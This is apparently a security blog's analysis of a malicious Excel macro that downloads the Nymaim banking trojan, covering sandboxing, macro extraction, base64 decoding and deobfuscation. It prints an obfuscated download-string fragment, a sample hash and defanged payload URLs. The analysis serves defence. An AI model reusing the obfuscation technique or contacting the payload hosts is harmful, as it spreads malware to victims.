We recently discovered a malicious excel file and ran it through Virus Total and only fifteen Anti-Virus vendors detected it as malware (another case of the poor hit rate for AV):
It was commonly identified as ‘X97M/Powmet’ and an online sandbox report gave us the following details:
This shows a number of important details including malicious urls and IP addresses. After receiving more samples (below) we ran further analysis starting with the initial file: sha256: 228222c7d5b85865b61ca9f5ae47d3699c608b05d158f6882460a9a11bf8a683
The file type detection tool shows us it was a ‘POIFS’ document, most likely an MS office doc.
Figure 1 POIFS document
OfficeMalscanner was the obvious choice for working on this file type, and it found the file was an Excel document:
Figure 2 Excel file type
OLE2 compound format document was detected but didn’t show any malicious traces present. In officemalscanner, info parameter can extract the vbmacro code and save it as dump.
Figure 3 VBMacro code Extraction
Figure 4 Extracted files
Now we can manually examine these files, especially ‘ThisWorkbook’ file. That code contains malicious url details in the function:
Figure 5 ThisWorkbook
We tried the same technique with the other excel files and URLS, these were also flagged as malicious:
Figure 6 VT Result for the link found inside the code
Figure 7 VT Result for downloaded file
Having confirmed the file was indeed malware, we then downloaded that executable for analysis. Before running further analysis, we checked to see if any previous research work had been carried out on this malware family and found it belongs to a banking trojan strain called ‘Nymaim’. Below is the email content:
Figure 8 Email as sample
When we drill down in the email content, we found attachment-related information:
We then extracted that code and converted it using base64 code:
Figure 9 before decoding
Figure 10 after decoding
Then we decoded it and – because it starts with ‘PK’ – it is clearly a packed file or zip file. After we unzipped it, we found it contains an excel file and, using the analysis tools, we were able to compare it with the previous file’s code:
Figure 11 Extracted file from the email file
Figure 12 Extracted Macros inside the excel from email file
We extracted the file’s macro and compared it to the previous file – both contained the same code:
Functions were heavily obfuscated inside the code. And we have reverse string call then it will be feed as input to other function.
For instance in the above StrReverse - "o^" + "D.^" + ")t^n" + "e^" + "il" + "cbe" + "w.^t^e" + "n." + "m^e^t^s" + "y^s" + " t^c" + "ej^bo^-" + "w^en^(^ ;"
Reversing ‘leopards’ we found the following string - “newobjetcsystem.net.webclient.Do”. This string is passed on to bugersfoot(). Then bugersfoot() is used in other functions – it keeps on going and makes reversing tough. The best way for us to proceed was to use the compiler and run the code so the behaviour could be observed:
This avromit is equal to ferdomon plus some other strings. If we look at the strings, it appears to “h+tt+p…” nothing but http:// and it has some functions like as ‘tmauw’ and news.exe so we checked what was in the function ‘tmauw’.
Its hxxp://bifoop(.)com/news.exe and is flagged by many AV vendor as malicious. We checked another interesting function and we found a new url so we examined that function too:
In this function, we can see http but need to resolve the noterdams and derfrop functions:
It is contacting hxxp://pasicnyk(.)com which is clearly malicious domain.
Conclusion
As usual, we recommend disabling the macros in MS office documents. Always be cautious with email attachments, particularly from unknown senders. Finally, we recommend you block those malicious URLS in the firewall and proxy.
On 2017-07-19